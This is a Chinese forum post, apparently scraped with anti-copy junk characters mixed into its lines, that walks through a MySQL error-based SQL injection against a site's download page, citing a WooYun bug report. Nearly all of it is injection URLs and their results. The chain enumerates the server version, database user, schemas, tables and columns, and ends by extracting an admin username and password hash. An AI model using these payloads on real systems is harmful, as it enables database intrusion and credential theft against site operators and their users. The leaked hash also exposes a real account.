php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

9 d/ m' n+ }- }: K6 `# ?4 q" H* U之前想找个测试 没想到这有 可以测试下做个记录而已
% x+ G& s  i" `
: \. [, {1 g# N$ A6 |$ {) {http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
* P7 M/ Q. L) N$ e- ?  N
/data0/htdocs/leqi_new/app/myapp.php

3 |1 G2 x8 }3 z2 M5 X1 j( T 或者
, X: ~/ p4 P; w6 G
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" v7 z% X5 w1 ~1 P& p
( j- e% F5 O5 w: m) Q/**********user()**********/  
/ z. X7 Z  n8 e/ Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 x0 c! R1 D& D3 h) Y7 U( h
7 Z: ]. F  Y- ~0 ~  r5 A/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& i: r' a# G% A& n: U% E; N! \information_schema
7 w! j+ b, i& Q2 H1 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
; B) t4 I6 W+ a" Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
. l9 P4 @8 M$ s* k7 t$ n7 p3 w
* ?: u* O4 D+ j1 b, m! e/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

8 ^% Y$ A6 l/ i1 R3 l+ U+ F1 a/**********limit依次递归爆字段名**********/
1 U- ^& w9 Y7 n! H) }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% j4 W( X6 ]+ M3 H9 X  zuser_id,username,nickname,passwd,group_id
4 {6 }  {* z% a& m; M9 Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 F( b, K- M' m  Y/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 u! |% a6 e% d! q6 E6 d, n, \/wapc/5000_0005_003
* x4 t1 \3 a9 E& h* ~- ~11 341 351 361
6 T7 F9 k$ {: s3 ^/**********爆数据**********/
" k# p# n. Y- I2 d. Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd

4 x* S" @! u3 ^
$ b+ q( c: P9 O- V7 q